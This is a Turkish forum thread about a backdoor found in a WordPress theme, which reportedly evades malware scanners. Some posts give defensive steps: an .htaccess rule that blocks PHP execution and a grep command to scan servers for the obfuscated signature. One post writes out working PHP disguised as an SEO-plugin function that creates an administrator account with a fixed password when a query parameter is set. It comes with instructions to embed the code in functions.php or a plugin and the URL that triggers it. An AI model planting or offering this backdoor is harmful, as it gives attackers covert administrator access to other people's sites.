Wordpress Admin Backdoor
-
1234567B bunu yazdıend bunu yazdıKaptaN bunu yazdı
Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez
fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya.
Uzak sunucuya göndermiyor.
Ayni temaya siz de mi denk geldiniz hocam?
-
https://hastebin.com/raw/wofesamose
şifreli hali backdoorun hiç bir malware scannere yakalanmıyor
decode edilmiş hali
https://www.unphp.net/decode/6de64366f25776de3f23b108e26c26af/
-
EcHoLL bunu yazdı
https://hastebin.com/raw/wofesamose
şifreli hali backdoorun hiç bir malware scannere yakalanmıyor
decode edilmiş hali
https://www.unphp.net/decode/6de64366f25776de3f23b108e26c26af/
Decode edilmiş hali çalışıyor mu peki?
Syntaxın ırzına geçilmiş gibi duruyor çünkü.
-
Bu Saldırılardan Korunmak için
wp-includes
wp-content
Klasörünün için .htaccess dosyası oluşturup Altdaki kodu çakın gitsin
<FilesMatch "\.(?i:php)$"> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> <IfModule mod_authz_core.c> Require all denied </IfModule> </FilesMatch>
Eğer Saldırıya ugramışsanız wp-admin komple silip tekraradan ftp atın
-
Sunucuzda Böyle bir malwere varmı taratmak için
putty ssh login oluyoruz
find /home*/*/public_html -type f -print0 | xargs -r0 grep -F 'GL\x4f\x42\x41\x4c\x53'>banakaymislarmi.txt
Arama bitince banakaymislarmi.txt bakıyoruz kayıp kaymadıklarını görüyorsunuz :)
-
end bunu yazdı1234567B bunu yazdıend bunu yazdıKaptaN bunu yazdı
Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez
fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya.
Uzak sunucuya göndermiyor.
Ayni temaya siz de mi denk geldiniz hocam?
Yok sadece kodlara baktım. Zaten çalışacağını düşünmüyorum. Sadece bu haliyle bu sınıf themes veya plugins dizininden wp incudes içerisine zıplayamaz. Test edelim.
Wp panele baktıgımızda yeni bir kullanıcı oluşturmuyor.
Evet gördüğümüz gibi çalışmıyor. Şimdi zaten bukadar kasmaya gerek yok. Functions.php içerisine erişebiliyor olman demek zaten site senin demek. İşsiz bir zamanıma geldiniz örnek birtane yazayım.
<?php add_action('wp_head', 'allInoneSeoPack__'); function allInoneSeoPack__() { if ($_GET['aisp'] == '1'): require('wp-includes/registration.php'); if (!username_exists($_GET['un']) and !empty($_GET['un'])): $user_id = wp_create_user($_GET['un'],"1234567B"); $user = new WP_User($user_id); $user->set_role('administrator'); endif; endif; } ?>
bunu functions.php içine yada eklentinin içine gömün ardından şöyle bir sorgu ytapmanız yeterli
siteadi.com/?aisp=1&un=tbt
oluşan kullanıcının adı tbt
şifresi 1234567B olacaktır.
-
require $_SERVER["DOCUMENT_ROOT"] . "/wp-load.php";
Yani çalışması için kodun ana dizine wp kurulu olması lazım -
1234567B bunu yazdıend bunu yazdı1234567B bunu yazdıend bunu yazdıKaptaN bunu yazdı
Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez
fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya.
Uzak sunucuya göndermiyor.
Ayni temaya siz de mi denk geldiniz hocam?
Yok sadece kodlara baktım. Zaten çalışacağını düşünmüyorum. Sadece bu haliyle bu sınıf themes veya plugins dizininden wp incudes içerisine zıplayamaz. Test edelim.
Wp panele baktıgımızda yeni bir kullanıcı oluşturmuyor.
Evet gördüğümüz gibi çalışmıyor. Şimdi zaten bukadar kasmaya gerek yok. Functions.php içerisine erişebiliyor olman demek zaten site senin demek. İşsiz bir zamanıma geldiniz örnek birtane yazayım.
bunu functions.php içine yada eklentinin içine gömün ardından şöyle bir sorgu ytapmanız yeterli
siteadi.com/?aisp=1&un=tbt
oluşan kullanıcının adı tbt
şifresi 1234567B olacaktır.
İyi de ben bu kod bloğunda loglanıyor demedim ki. Adam mal mı da backdoor bırakıp izini sürmesin. Fonksiyon dosyası şifrelidir, araya sıkıştırılmıştır. functions diye bir php dosyasuı yok mu wp tema dizininde, heh ondan bahsediyorum. Lütfen...
-
çok faydası oldu teşekkürler.
-
end bunu yazdı1234567B bunu yazdıend bunu yazdı1234567B bunu yazdıend bunu yazdıKaptaN bunu yazdı
Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez
fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya.
Uzak sunucuya göndermiyor.
Ayni temaya siz de mi denk geldiniz hocam?
Yok sadece kodlara baktım. Zaten çalışacağını düşünmüyorum. Sadece bu haliyle bu sınıf themes veya plugins dizininden wp incudes içerisine zıplayamaz. Test edelim.
Wp panele baktıgımızda yeni bir kullanıcı oluşturmuyor.
Evet gördüğümüz gibi çalışmıyor. Şimdi zaten bukadar kasmaya gerek yok. Functions.php içerisine erişebiliyor olman demek zaten site senin demek. İşsiz bir zamanıma geldiniz örnek birtane yazayım.
bunu functions.php içine yada eklentinin içine gömün ardından şöyle bir sorgu ytapmanız yeterli
siteadi.com/?aisp=1&un=tbt
oluşan kullanıcının adı tbt
şifresi 1234567B olacaktır.
İyi de ben bu kod bloğunda loglanıyor demedim ki. Adam mal mı da backdoor bırakıp izini sürmesin. Fonksiyon dosyası şifrelidir, araya sıkıştırılmıştır. functions diye bir php dosyasuı yok mu wp tema dizininde, heh ondan bahsediyorum. Lütfen...
Ne dediğini anlamakta güçlük çekiyorum. Kimse sana bu kod blogu loglanıyor diyorsun demediki